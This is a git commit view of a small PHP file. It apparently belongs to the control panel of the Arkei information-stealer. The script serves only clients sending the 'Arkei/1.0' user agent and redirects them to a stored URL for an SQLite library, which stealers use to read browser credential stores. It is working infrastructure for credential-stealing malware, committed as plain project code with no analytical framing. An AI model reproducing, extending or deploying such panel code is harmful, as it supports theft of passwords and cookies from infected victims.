initial commit

This commit is contained in:
i2p
2026-08-27 10:51:19 -06:00
commit 2c3a37b9ef
51 changed files with 4353 additions and 0 deletions
+21
View File
@@ -0,0 +1,21 @@
<?php
if($_SERVER["HTTP_USER_AGENT"] != "Arkei/1.0")
exit(0);
require("../app/config.php");
$database = mysqli_connect($config["db_server"], $config["db_user"], $config["db_password"], $config["db_name"]);
if($database)
{
$get= $database->query("SELECT `Value` FROM `settings` WHERE `Name`='sqlite_lib_url'")->fetch_array();
header('Location: '. $get["Value"]);
}
else
{
exit(0);
}
?>